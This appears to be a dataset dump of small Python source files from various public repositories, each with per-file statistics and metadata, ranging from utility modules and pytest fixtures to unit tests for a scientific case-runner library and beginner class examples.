return builder.StartVector(1, numElems, 1) def CdnImageFetchRespEnd(builder): return builder.EndObject()
36.177419
149
0.701293
257
2,243
5.980545
0.284047
0.054652
0.143136
0.159401
0.392973
0.335068
0.279115
0.279115
0.216656
0.216656
0
0.014493
0.200178
2,243
61
150
36.770492
0.842252
0.085154
0
0.285714
1
0
0.001958
0
0
0
0
0
0
1
0.285714
false
0
0.071429
0.047619
0.642857
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
3
73c7d2479c4d1e666c228c7f65f5dc34f85544de
570
py
Python
producers/decorator.py
gurleen/dtv-gfx-next
529c226a30c9b668a44e2a2470c3593287867caf
[ "MIT" ]
null
null
null
producers/decorator.py
gurleen/dtv-gfx-next
529c226a30c9b668a44e2a2470c3593287867caf
[ "MIT" ]
null
null
null
producers/decorator.py
gurleen/dtv-gfx-next
529c226a30c9b668a44e2a2470c3593287867caf
[ "MIT" ]
null
null
null
import functools from . import * import producers producer_funcs = [] def producer(*args, **kwargs): debug_only = kwargs.get("debug_only", False) prod_only = kwargs.get("prod_only", False) def factory(func): producer_funcs.append((func, debug_only, prod_only)) @functools.wraps(func) def wrapper(*args, **kwargs): return func(*args, **kwargs) return wrapper if len(args) > 0 and callable(args[0]): return factory(args[0]) return factory def collect_producers(): return producer_funcs
19.655172
60
0.642105
70
570
5.085714
0.371429
0.109551
0.073034
0.101124
0
0
0
0
0
0
0
0.006912
0.238596
570
28
61
20.357143
0.813364
0
0
0
0
0
0.033333
0
0
0
0
0
0
1
0.222222
false
0
0.166667
0.111111
0.666667
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
3
73d7e36e0f5af950d58e18966f412469cf517ac3
931
py
Python
src/metpy/_version.py
MethaneRain/MetPy
d5e1416e038dd01f9d528d824e12224ab56e009c
[ "BSD-3-Clause" ]
null
null
null
src/metpy/_version.py
MethaneRain/MetPy
d5e1416e038dd01f9d528d824e12224ab56e009c
[ "BSD-3-Clause" ]
127
2020-10-27T15:12:37.000Z
2022-03-30T16:05:31.000Z
src/metpy/_version.py
MethaneRain/MetPy
d5e1416e038dd01f9d528d824e12224ab56e009c
[ "BSD-3-Clause" ]
null
null
null
# Copyright (c) 2019 MetPy Developers. # Distributed under the terms of the BSD 3-Clause License. # SPDX-License-Identifier: BSD-3-Clause """Tools for versioning.""" def get_version(): """Get MetPy's version. Either get it from package metadata, or get it using version control information if a development install. """ try: from setuptools_scm import get_version return get_version(root='../..', relative_to=__file__, version_scheme='post-release', local_scheme='dirty-tag') except (ImportError, LookupError): try: from importlib.metadata import version, PackageNotFoundError except ImportError: # Can remove when we require Python > 3.7 from importlib_metadata import version, PackageNotFoundError try: return version(__package__) except PackageNotFoundError: return 'Unknown'
34.481481
87
0.663802
104
931
5.788462
0.615385
0.049834
0.033223
0.089701
0.179402
0.179402
0
0
0
0
0
0.011561
0.256713
931
26
88
35.807692
0.858382
0.346939
0
0.214286
0
0
0.056799
0
0
0
0
0
0
1
0.071429
true
0
0.357143
0
0.642857
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
3
73ec25c709ed7bbba8bf8288a093ad286649cf58
230
py
Python
pekobot/default_config.py
Akegarasu/pekobot
402075d4de13d3fd9e58f22fc62338c58fb96663
[ "BSD-2-Clause" ]
2
2021-02-09T03:28:30.000Z
2021-04-27T17:58:19.000Z
pekobot/default_config.py
Akegarasu/pekobot
402075d4de13d3fd9e58f22fc62338c58fb96663
[ "BSD-2-Clause" ]
null
null
null
pekobot/default_config.py
Akegarasu/pekobot
402075d4de13d3fd9e58f22fc62338c58fb96663
[ "BSD-2-Clause" ]
null
null
null
from datetime import timedelta from typing import Collection, Union, Iterable, Pattern, Optional, Dict, Any COMPRESS: int = 1 DEBUG: bool = True API_VERSION: int = 3 API_URL: str = f"https://www.kaiheila.cn/api/v{API_VERSION}"
23
76
0.747826
36
230
4.694444
0.805556
0.118343
0
0
0
0
0
0
0
0
0
0.010152
0.143478
230
9
77
25.555556
0.847716
0
0
0
0
0
0.183406
0
0
0
0
0
0
1
0
true
0
0.333333
0
0.333333
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
3
73f108b86b2b6641b0239d0f4e78bcf681b01f10
144
py
Python
codewof/programming/content/en/reverse-string/solution.py
taskmaker1/codewof
92d52cd3ee91f0f311ff01a92cf6ec07e5593b8d
[ "MIT" ]
3
2019-08-29T04:11:22.000Z
2021-06-22T16:05:51.000Z
codewof/programming/content/en/reverse-string/solution.py
taskmaker1/codewof
92d52cd3ee91f0f311ff01a92cf6ec07e5593b8d
[ "MIT" ]
265
2019-05-30T03:51:46.000Z
2022-03-31T01:05:12.000Z
codewof/programming/content/en/reverse-string/solution.py
samuelsandri/codewof
c9b8b378c06b15a0c42ae863b8f46581de04fdfc
[ "MIT" ]
7
2019-06-29T12:13:37.000Z
2021-09-06T06:49:14.000Z
def reverse_string(string): reverse = '' for char in range(len(string) - 1, -1, -1): reverse += string[char] print(reverse)
24
47
0.590278
19
144
4.421053
0.526316
0.309524
0
0
0
0
0
0
0
0
0
0.028037
0.256944
144
5
48
28.8
0.757009
0
0
0
0
0
0
0
0
0
0
0
0
1
0.2
false
0
0
0
0.2
0.2
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
73f39e42318716e272273d743fb0c7cfd170716d
145
py
Python
restorm/exceptions.py
josesanch/restorm
2a8af13e57151ea985445e1e7189158f20cd9676
[ "MIT" ]
1
2015-07-16T15:00:04.000Z
2015-07-16T15:00:04.000Z
restorm/exceptions.py
josesanch/restorm
2a8af13e57151ea985445e1e7189158f20cd9676
[ "MIT" ]
null
null
null
restorm/exceptions.py
josesanch/restorm
2a8af13e57151ea985445e1e7189158f20cd9676
[ "MIT" ]
null
null
null
class RestException(Exception): pass class ResourceException(RestException): pass class RestServerException(RestException): pass
13.181818
41
0.765517
12
145
9.25
0.5
0.162162
0
0
0
0
0
0
0
0
0
0
0.172414
145
10
42
14.5
0.925
0
0
0.5
0
0
0
0
0
0
0
0
0
1
0
true
0.5
0
0
0.5
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
0
0
0
0
0
3
fb47e7a4e34dc79a3540da9d562779befff02f36
209
py
Python
programming-logic/placeholder.py
raulrosapacheco/python3-udemy
b84e6f82417aecd0e2a28c3fb3cb222e057a660b
[ "MIT" ]
null
null
null
programming-logic/placeholder.py
raulrosapacheco/python3-udemy
b84e6f82417aecd0e2a28c3fb3cb222e057a660b
[ "MIT" ]
null
null
null
programming-logic/placeholder.py
raulrosapacheco/python3-udemy
b84e6f82417aecd0e2a28c3fb3cb222e057a660b
[ "MIT" ]
null
null
null
""" 'pass' or '...' (ellipsis) works as a placeholder for the programmer to write something later """ valor = True if valor: pass else: print('Bye') print() if valor: ... else: print('Bye')
12.294118
93
0.602871
28
209
4.5
0.714286
0.111111
0.190476
0
0
0
0
0
0
0
0
0
0.239234
209
16
94
13.0625
0.792453
0.444976
0
0.6
0
0
0.055556
0
0
0
0
0
0
1
0
false
0.1
0
0
0
0.3
1
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
3
fb632ece452922eaad81259b7a53f4c983cf14ad
456
py
Python
nni/algorithms/compression/pytorch/quantization/__init__.py
dutxubo/nni
c16f4e1c89b54b8b80661ef0072433d255ad2d24
[ "MIT" ]
9,680
2019-05-07T01:42:30.000Z
2022-03-31T16:48:33.000Z
nni/algorithms/compression/pytorch/quantization/__init__.py
dutxubo/nni
c16f4e1c89b54b8b80661ef0072433d255ad2d24
[ "MIT" ]
1,957
2019-05-06T21:44:21.000Z
2022-03-31T09:21:53.000Z
nni/algorithms/compression/pytorch/quantization/__init__.py
dutxubo/nni
c16f4e1c89b54b8b80661ef0072433d255ad2d24
[ "MIT" ]
1,571
2019-05-07T06:42:55.000Z
2022-03-31T03:19:24.000Z
# Copyright (c) Microsoft Corporation. # Licensed under the MIT license. from .bnn_quantizer import BNNQuantizer from .dorefa_quantizer import DoReFaQuantizer from .lsq_quantizer import LsqQuantizer from .native_quantizer import NaiveQuantizer from .observer_quantizer import ObserverQuantizer from .qat_quantizer import QAT_Quantizer __all__ = ['NaiveQuantizer', 'QAT_Quantizer', 'DoReFaQuantizer', 'BNNQuantizer', 'LsqQuantizer', 'ObserverQuantizer']
35.076923
117
0.828947
48
456
7.625
0.5
0.245902
0
0
0
0
0
0
0
0
0
0
0.100877
456
12
118
38
0.892683
0.149123
0
0
0
0
0.215584
0
0
0
0
0
0
1
0
false
0
0.857143
0
0.857143
0
0
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
3
fb7096c4be6076a0b02196abdbe74f8929579471
227
py
Python
api/boilerplate/exceptions.py
SteffenBerlin/django-rest-chatbot
8c7966f38ccd6fb0eb71dc2025f74f88ccfa89cd
[ "MIT" ]
null
null
null
api/boilerplate/exceptions.py
SteffenBerlin/django-rest-chatbot
8c7966f38ccd6fb0eb71dc2025f74f88ccfa89cd
[ "MIT" ]
null
null
null
api/boilerplate/exceptions.py
SteffenBerlin/django-rest-chatbot
8c7966f38ccd6fb0eb71dc2025f74f88ccfa89cd
[ "MIT" ]
null
null
null
from rest_framework.exceptions import APIException class ServiceUnavailable(APIException): status_code = 503 default_detail = 'Service temporarily unavailable, try again later.' default_code = 'service_unavailable'
37.833333
72
0.801762
24
227
7.375
0.791667
0
0
0
0
0
0
0
0
0
0
0.015385
0.140969
227
6
73
37.833333
0.892308
0
0
0
0
0
0.298246
0
0
0
0
0
0
1
0
false
0
0.2
0
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
3
fb7b3732a00d5933c96ba7ee53002e202f3ffdfe
866
py
Python
ninjin/pagination.py
dmitrii-sim/ninjin
6c3edb46ec873f28ed0b1fcbe20193445e3107e9
[ "MIT" ]
2
2020-06-03T07:44:46.000Z
2020-06-05T11:30:46.000Z
ninjin/pagination.py
dmitrii-sim/ninjin
6c3edb46ec873f28ed0b1fcbe20193445e3107e9
[ "MIT" ]
null
null
null
ninjin/pagination.py
dmitrii-sim/ninjin
6c3edb46ec873f28ed0b1fcbe20193445e3107e9
[ "MIT" ]
1
2020-06-18T15:59:18.000Z
2020-06-18T15:59:18.000Z
class BasicPagination: items_per_page = 1 max_items_per_page = 100 def __init__(self, pagination: dict = None, items_per_page: int = None, max_items_per_page: int = None): pagination = pagination or {} self.page = pagination.get('page', 0) self.max_items_per_page = max_items_per_page self.items_per_page = min( pagination.get('items_per_page', items_per_page), self.max_items_per_page ) self.limit = (self.page + 1) * self.items_per_page self.offset = self.page * self.items_per_page self.next = False def paginate(self, query): return query.limit(self.limit).offset(self.offset) @property def result(self): # TODO next page return { 'page': self.page }
28.866667
61
0.581986
107
866
4.401869
0.271028
0.203822
0.305732
0.159236
0.329087
0
0
0
0
0
0
0.010309
0.327945
866
29
62
29.862069
0.798969
0.016166
0
0
0
0
0.025882
0
0
0
0
0.034483
0
1
0.125
false
0
0
0.083333
0.333333
0
0
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
3
fb7edea6547e5448747188195492f349f50755fb
18,847
py
Python
tests/test_gen/test_case_runner.py
toddrme2178/xyzpy
d71057df6cd7db48cfcbfacc21e77b4b79176afa
[ "MIT" ]
null
null
null
tests/test_gen/test_case_runner.py
toddrme2178/xyzpy
d71057df6cd7db48cfcbfacc21e77b4b79176afa
[ "MIT" ]
null
null
null
tests/test_gen/test_case_runner.py
toddrme2178/xyzpy
d71057df6cd7db48cfcbfacc21e77b4b79176afa
[ "MIT" ]
null
null
null
import pytest import xarray as xr import numpy as np from numpy.testing import assert_allclose from xyzpy.gen.case_runner import ( case_runner, _cases_to_ds, case_runner_to_ds, find_missing_cases, fill_missing_cases, ) from xyzpy.gen.combo_runner import combo_runner_to_ds from . import ( foo3_scalar, foo3_float_bool, foo2_array, foo2_array_array, foo2_zarray1_zarray2, ) # --------------------------------------------------------------------------- # # CASE_RUNNER tests # # --------------------------------------------------------------------------- # class TestCaseRunner: def test_seq(self): cases = ((1, 10, 100), (2, 20, 200), (3, 30, 300)) xs = case_runner(foo3_scalar, ('a', 'b', 'c'), cases, verbosity=0) assert xs == (111, 222, 333) def test_progbar(self): cases = ((1, 10, 100), (2, 20, 200), (3, 30, 300)) xs = case_runner(foo3_scalar, ('a', 'b', 'c'), cases, verbosity=2) assert xs == (111, 222, 333) def test_constants(self): cases = ((1,), (2,), (3,)) xs = case_runner(foo3_scalar, ('a', 'b', 'c'), cases, constants={'b': 10, 'c': 100}) assert xs == (111, 112, 113) def test_parallel(self): cases = ((1, 10, 100), (2, 20, 200), (3, 30, 300)) xs = case_runner(foo3_scalar, ('a', 'b', 'c'), cases, num_workers=1) assert xs == (111, 222, 333) def test_split(self): cases = ((1, 10, 100), (2, 20, 200), (3, 30, 300)) a, b = case_runner(foo3_float_bool, ('a', 'b', 'c'), cases, split=True) assert a == (111, 222, 333) assert b == (False, True, False) def test_single_args(self): cases = (1, 2, 3) xs = case_runner(foo3_scalar, 'a', cases, constants={'b': 10, 'c': 100}) assert xs == (111, 112, 113) class TestCasesToDS: def test_simple(self): results = ((1,), (2,), (3,), (4,), (5,)) cases = (('a', 'a'), ('a', 'b'), ('b', 'c'), ('c', 'c'), ('b', 'a')) ds = _cases_to_ds(results=results, fn_args=('case1', 'case2'), var_names=('bananas',), cases=cases, var_dims={'bananas': ()}, var_coords={}) assert_allclose(ds.bananas.data, [[1, 2, np.nan], [5, np.nan, 3], [np.nan, np.nan, 4]]) def test_single_result_format(self): results = [(1,), (2,), (3,), (4,), (5,)] cases = [('a', 'a'), ('a', 'b'), ('b', 'c'), ('c', 'c'), ('b', 'a')] ds = _cases_to_ds(results=results, cases=cases, fn_args=('case1', 'case2'), var_names=('bananas',), var_dims={'bananas': ()}, var_coords={}) assert_allclose(ds.bananas.data, [[1, 2, np.nan], [5, np.nan, 3], [np.nan, np.nan, 4]]) def test_single_cases_format(self): results = [(1,), (2,), (3,), (4,), (5,)] cases = [('a',), ('b',), ('c',), ('d',), ('e',)] ds = _cases_to_ds(results=results, cases=cases, fn_args=('case1',), var_names=('bananas',), var_dims={'bananas': ()}, var_coords={},) assert_allclose(ds.bananas.data, [1, 2, 3, 4, 5]) def test_multires(self): var_names = ('lists',) var_vals = [np.arange(10) + i for i in range(5)] var_dims = {'lists': ('time',)} var_coords = {'time': np.arange(10) / 10} fn_args = ('letter',) case_cnfgs = ['a', 'b', 'c', 'd', 'e'] ds = _cases_to_ds(results=var_vals, fn_args=fn_args, cases=case_cnfgs, var_names=var_names, var_dims=var_dims, var_coords=var_coords) assert ds.time.data.dtype == float def test_add_to_ds(self): ds = xr.Dataset(coords={'a': [1, 2], 'b': [10, 20]}) ds['x'] = (('a', 'b'), [[11, 21], [12, 0]]) assert ds['x'].sel(a=2, b=20).data == 0 _cases_to_ds(results=[22], fn_args=['a', 'b'], cases=[[2, 20]], var_names=['x'], add_to_ds=ds, overwrite=True) assert ds['x'].data.dtype == int assert ds['x'].sel(a=2, b=20).data == 22 def test_add_to_ds_array(self): ds = xr.Dataset(coords={'a': [1, 2], 'b': [10, 20], 't': [0.1, 0.2, 0.3]}) ds['x'] = (('a', 'b', 't'), [[[11.1, 11.2, 11.3], [21.1, 21.2, 21.3]], [[12.1, 12.2, 12.3], [0, 0, 0]]]) assert_allclose(ds['x'].sel(a=2, b=20).data, [0, 0, 0]) _cases_to_ds(results=[[[22.1, 22.2, 22.3]]], fn_args=['a', 'b'], cases=[[2, 20]], var_names=['x'], var_dims=['t'], add_to_ds=ds, overwrite=True) assert_allclose(ds['x'].sel(a=2, b=20).data, [22.1, 22.2, 22.3]) def test_add_to_ds_no_overwrite(self): ds = xr.Dataset(coords={'a': [1, 2], 'b': [10, 20]}) ds['x'] = (('a', 'b'), [[11, 21], [12, 0]]) assert ds['x'].sel(a=2, b=20).data == 0 with pytest.raises(ValueError): _cases_to_ds(results=[22], fn_args=['a', 'b'], cases=[[2, 20]], var_names=['x'], add_to_ds=ds, overwrite=False) ds = xr.Dataset(coords={'a': [1, 2], 'b': [10, 20]}) ds['x'] = (('a', 'b'), [[11, 21], [12, None]]) _cases_to_ds(results=[22], fn_args=['a', 'b'], cases=[[2, 20]], var_names=['x'], add_to_ds=ds, overwrite=False) assert ds['x'].sel(a=2, b=20).data == 22 class TestCaseRunnerToDS: def test_single(self): cases = [(1, 20, 300), (3, 20, 100)] ds = case_runner_to_ds(foo3_scalar, ['a', 'b', 'c'], cases=cases, var_names='sum') assert_allclose(ds['a'].data, [1, 3]) assert_allclose(ds['b'].data, [20]) assert_allclose(ds['c'].data, [100, 300]) assert ds['sum'].loc[{'a': 1, 'b': 20, 'c': 300}].data == 321 assert ds['sum'].loc[{'a': 3, 'b': 20, 'c': 100}].data == 123 assert ds['sum'].loc[{'a': 1, 'b': 20, 'c': 100}].isnull() assert ds['sum'].loc[{'a': 3, 'b': 20, 'c': 300}].isnull() def test_single_dict_cases(self): cases = [{'a': 1, 'b': 20, 'c': 300}, {'a': 3, 'b': 20, 'c': 100}] ds = case_runner_to_ds(foo3_scalar, None, cases=cases, var_names='sum') assert_allclose(ds['a'].data, [1, 3]) assert_allclose(ds['b'].data, [20]) assert_allclose(ds['c'].data, [100, 300]) assert ds['sum'].loc[{'a': 1, 'b': 20, 'c': 300}].data == 321 assert ds['sum'].loc[{'a': 3, 'b': 20, 'c': 100}].data == 123 assert ds['sum'].loc[{'a': 1, 'b': 20, 'c': 100}].isnull() assert ds['sum'].loc[{'a': 3, 'b': 20, 'c': 300}].isnull() def test_multires(self): cases = [(1, 20, 300), (3, 20, 100)] ds = case_runner_to_ds(foo3_float_bool, fn_args=['a', 'b', 'c'], cases=cases, var_names=['sum', 'a_even']) assert_allclose(ds['a'].data, [1, 3]) assert_allclose(ds['b'].data, [20]) assert_allclose(ds['c'].data, [100, 300]) assert ds['sum'].loc[{'a': 1, 'b': 20, 'c': 300}].data == 321 assert ds['sum'].loc[{'a': 3, 'b': 20, 'c': 100}].data == 123 assert ds['sum'].loc[{'a': 1, 'b': 20, 'c': 100}].isnull() assert ds['sum'].loc[{'a': 3, 'b': 20, 'c': 300}].isnull() assert ds['a_even'].data.dtype == object assert bool(ds['a_even'].sel(a=1, b=20, c=300).data) is False assert bool(ds['a_even'].sel(a=3, b=20, c=100).data) is False assert ds['a_even'].loc[{'a': 1, 'b': 20, 'c': 100}].isnull() assert ds['a_even'].loc[{'a': 3, 'b': 20, 'c': 300}].isnull() def test_array_return(self): ds = case_runner_to_ds(fn=foo2_array, fn_args=['a', 'b'], cases=[(2, 30), (4, 50)], var_names='x', var_dims=['time'], var_coords={'time': np.arange(10) / 10}) assert ds.x.data.dtype == float assert ds.x.sel(a=2, b=50, time=0.7).isnull() assert ds.x.sel(a=4, b=50, time=0.3).data == 54.3 def test_multi_array_return(self): ds = case_runner_to_ds(fn=foo2_array_array, fn_args=['a', 'b'], cases=[(2, 30), (4, 50)], var_names=['x', 'y'], var_dims={('x', 'y'): 'time'}, var_coords={'time': ['a', 'b', 'c', 'd', 'e']}) assert ds['time'].data.dtype != object assert_allclose(ds['x'].sel(a=4, b=50).data, [50, 54, 58, 62, 66]) assert_allclose(ds['y'].sel(a=4, b=50).data, [50, 46, 42, 38, 34]) def test_align_and_fillna_int(self): ds1 = case_runner_to_ds(foo2_array_array, fn_args=['a', 'b'], cases=[(1, 10), (2, 20)], var_names=['x', 'y'], var_dims={('x', 'y'): 'time'}, var_coords={'time': ['a', 'b', 'c', 'd', 'e']}) ds2 = case_runner_to_ds(foo2_array_array, fn_args=['a', 'b'], cases=[(2, 10), (1, 20)], var_names=['x', 'y'], var_dims={('x', 'y'): 'time'}, var_coords={'time': ['a', 'b', 'c', 'd', 'e']}) assert not np.logical_not(ds1['x'].isnull()).all() assert not np.logical_not(ds1['y'].isnull()).all() assert not np.logical_not(ds2['x'].isnull()).all() assert not np.logical_not(ds2['y'].isnull()).all() ds1, ds2 = xr.align(ds1, ds2, join='outer') fds = ds1.fillna(ds2) assert np.logical_not(fds['x'].isnull()).all() assert np.logical_not(fds['y'].isnull()).all() def test_align_and_fillna_complex(self): ds1 = case_runner_to_ds(foo2_zarray1_zarray2, fn_args=['a', 'b'], cases=[(1j, 10), (2j, 20)], var_names=['x', 'y'], var_dims={('x', 'y'): 'time'}, var_coords={'time': ['a', 'b', 'c', 'd', 'e']}) ds2 = case_runner_to_ds(foo2_zarray1_zarray2, fn_args=['a', 'b'], cases=[(2j, 10), (1j, 20)], var_names=['x', 'y'], var_dims={('x', 'y'): 'time'}, var_coords={'time': ['a', 'b', 'c', 'd', 'e']}) assert not np.logical_not(np.isnan(ds1['x'].data)).all() assert not np.logical_not(np.isnan(ds1['y'].data)).all() assert not np.logical_not(np.isnan(ds2['x'].data)).all() assert not np.logical_not(np.isnan(ds2['y'].data)).all() assert all(t == complex for t in (ds1.x.dtype, ds2.x.dtype, ds1.y.dtype, ds2.y.dtype)) assert ds1.y.dtype == complex assert ds2.y.dtype == complex ds1, ds2 = xr.align(ds1, ds2, join='outer') fds = ds1.fillna(ds2) assert np.logical_not(np.isnan(fds['x'].data)).all() assert np.logical_not(np.isnan(fds['y'].data)).all() # --------------------------------------------------------------------------- # # Finding and filling missing data # # --------------------------------------------------------------------------- # class TestFindMissingCases: def test_simple(self): ds = xr.Dataset(coords={'a': [1, 2, 3], 'b': [40, 50]}) ds['x'] = (('a', 'b'), np.array([[0.1, np.nan], [np.nan, 0.2], [np.nan, np.nan]])) # Target cases and settings t_cases = ((1, 50), (2, 40), (3, 40), (3, 50)) t_configs = tuple(dict(zip(['a', 'b'], t_case)) for t_case in t_cases) # Missing cases and settings m_args, m_cases = find_missing_cases(ds) m_configs = tuple(dict(zip(m_args, m_case)) for m_case in m_cases) # Assert same set of coordinates assert all(t_config in m_configs for t_config in t_configs) assert all(m_config in t_configs for m_config in m_configs) def test_multires(self): ds = xr.Dataset(coords={'a': [1, 2, 3], 'b': [40, 50]}) ds['x'] = (('a', 'b'), np.array([[0.1, np.nan], [np.nan, 0.2], [np.nan, np.nan]])) ds['y'] = (('a', 'b'), np.array([['a', None], [None, 'b'], [None, None]])) # Target cases and settings t_cases = ((1, 50), (2, 40), (3, 40), (3, 50)) t_configs = tuple(dict(zip(['a', 'b'], t_case)) for t_case in t_cases) # Missing cases and settings m_args, m_cases = find_missing_cases(ds) m_configs = tuple(dict(zip(m_args, m_case)) for m_case in m_cases) # Assert same set of coordinates assert set(m_args) == {'a', 'b'} assert all(t_config in m_configs for t_config in t_configs) assert all(m_config in t_configs for m_config in m_configs) def test_var_dims_leave(self): ds = xr.Dataset(coords={'a': [1, 2, 3], 'b': [40, 50], 't': [0.1, 0.2, 0.3]}) ds['x'] = (('a', 'b'), np.array([[0.1, np.nan], [np.nan, 0.2], [np.nan, np.nan]])) ds['y'] = (('a', 'b', 't'), np.array([[[0.2] * 3, [np.nan] * 3], [[np.nan] * 3, [0.4] * 3], [[np.nan] * 3, [np.nan] * 3]])) # Target cases and settings t_cases = ((1, 50), (2, 40), (3, 40), (3, 50)) t_configs = tuple(dict(zip(['a', 'b'], t_case)) for t_case in t_cases) # Missing cases and settings m_args, m_cases = find_missing_cases(ds, ignore_dims='t') m_configs = tuple(dict(zip(m_args, m_case)) for m_case in m_cases) # Assert same set of coordinates assert set(m_args) == {'a', 'b'} assert all(t_config in m_configs for t_config in t_configs) assert all(m_config in t_configs for m_config in m_configs) class TestFillMissingCases: def test_simple(self): ds = xr.Dataset(coords={'a': [1, 2, 3], 'b': [40, 50]}) ds['x'] = (('a', 'b'), np.array([[641, np.nan], [np.nan, 652], [np.nan, np.nan]])) fill_missing_cases(ds, fn=foo3_scalar, constants={'c': 600}, var_names='x') assert_allclose(ds.x.data, [[641, 651], [642, 652], [643, 653]]) def test_multires(self): ds = xr.Dataset(coords={'a': [1, 2, 3], 'b': [40, 50]}) ds['x'] = (('a', 'b'), np.array([[641, np.nan], [np.nan, 652], [np.nan, np.nan]])) ds['even'] = (('a', 'b'), np.array([[False, None], [None, True], [None, None]])) fill_missing_cases(ds, fn=foo3_float_bool, constants={'c': 600}, var_names=['x', 'even']) assert_allclose(ds.x.data, [[641, 651], [642, 652], [643, 653]]) assert(ds.even.data.tolist() == [[False, False], [True, True], [False, False]]) def test_array_return(self): ds = xr.Dataset(coords={'a': [1, 2, 3], 'b': [40, 50], 't': [0.0, 0.1, 0.2, 0.3, 0.4]}) ds['z1'] = (('a', 'b', 't'), np.array([[41 + 0.1j * np.arange(5), [np.nan] * 5], [[np.nan] * 5, 52 + 0.1j * np.arange(5)], [[np.nan] * 5, [np.nan] * 5]])) ds['z2'] = (('a', 'b', 't'), np.array([[41 - 0.1j * np.arange(5), [np.nan] * 5], [[np.nan] * 5, 52 - 0.1j * np.arange(5)], [[np.nan] * 5, [np.nan] * 5]])) settings = {'var_names': ['z1', 'z2'], 'var_dims': {('z1', 'z2'): 't'}, 'var_coords': {'t': [0.0, 0.1, 0.2, 0.3, 0.4]}} fill_missing_cases(ds, foo2_zarray1_zarray2, **settings) dst = combo_runner_to_ds(foo2_zarray1_zarray2, combos=[('a', [1, 2, 3]), ('b', [40, 50])], **settings) assert dst.equals(ds) def test_float_coords(self): ds = xr.Dataset(coords={'a': [1.1, 2.1, 3.1], 'b': [40.01, 50.01]}) ds['x'] = (('a', 'b'), np.array([[641.11, np.nan], [np.nan, 652.11], [np.nan, np.nan]])) fill_missing_cases(ds, fn=foo3_scalar, constants={'c': 600}, var_names='x') assert_allclose(ds.x.data, [[641.11, 651.11], [642.11, 652.11], [643.11, 653.11]])
46.080685
79
0.408871
2,365
18,847
3.103594
0.078647
0.012807
0.041417
0.019074
0.78406
0.748638
0.724387
0.671526
0.640055
0.639237
0
0.080735
0.387489
18,847
408
80
46.193627
0.555094
0.037831
0
0.50838
0
0
0.032023
0
0
0
0
0
0.22067
1
0.075419
false
0
0.019553
0
0.108939
0
0
0
0
null
0
0
0
0
1
1
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
fbd81201ced4fe0564a5952c5882dbc41438e5b9
1,300
py
Python
tests/conftest.py
sobelek/pymongo-migrate
de2347007cceb9c0594718959cf4d6652727a8b5
[ "Apache-2.0" ]
null
null
null
tests/conftest.py
sobelek/pymongo-migrate
de2347007cceb9c0594718959cf4d6652727a8b5
[ "Apache-2.0" ]
null
null
null
tests/conftest.py
sobelek/pymongo-migrate
de2347007cceb9c0594718959cf4d6652727a8b5
[ "Apache-2.0" ]
null
null
null
import random from datetime import timezone from pathlib import Path import pymongo import pytest from bson import CodecOptions from pymongo_migrate.mongo_migrate import MongoMigrate TEST_DIR = Path(__file__).parent @pytest.fixture def mongo_url(): return "mongodb://localhost:27017/" @pytest.fixture def db_name(): random_id = random.randint(100, 10_000_000) # nosec return f"test_{random_id}" @pytest.fixture def db_uri(mongo_url, db_name): return f"{mongo_url}{db_name}" @pytest.fixture def db(mongo_url, db_name): client = pymongo.MongoClient(mongo_url) yield client[db_name] client.drop_database(db_name) client.close() @pytest.fixture def db_collection(db): return db.get_collection( "pymongo_migrate", codec_options=CodecOptions(tz_aware=True, tzinfo=timezone.utc), ) @pytest.fixture() def migrations_dir(): return str(TEST_DIR / "migrations") @pytest.fixture def mongo_migrate(db_uri, db_name, db, migrations_dir): mm = MongoMigrate(pymongo.MongoClient(db_uri), migrations_dir=migrations_dir) yield mm mm.client.close() @pytest.fixture() def get_db_migrations(db_collection): def getter(): return list(db_collection.find(projection={"_id": False}, sort=[("name", 1)])) return getter
20.3125
86
0.73
178
1,300
5.08427
0.337079
0.114917
0.141436
0.079558
0.059669
0
0
0
0
0
0
0.015568
0.16
1,300
63
87
20.634921
0.813187
0.003846
0
0.186047
0
0
0.072699
0.020108
0
0
0
0
0
1
0.209302
false
0
0.162791
0.116279
0.534884
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
3
fbda7db9488522776ba4241a52e61804eb5525a3
244
py
Python
OOP/simpleclass.py
HarshilPatel007/learn-python
e64e6f8c95d39bfc229519ee7043787864997cdf
[ "MIT" ]
null
null
null
OOP/simpleclass.py
HarshilPatel007/learn-python
e64e6f8c95d39bfc229519ee7043787864997cdf
[ "MIT" ]
null
null
null
OOP/simpleclass.py
HarshilPatel007/learn-python
e64e6f8c95d39bfc229519ee7043787864997cdf
[ "MIT" ]
null
null
null
class Smartphone: def gallary(self): print("Gallary") def browser(self): print("Browser") def app_store(self): print("App Store") x = Smartphone() x.gallary() x.browser() x.gallary()
12.842105
27
0.536885
27
244
4.814815
0.37037
0.207692
0
0
0
0
0
0
0
0
0
0
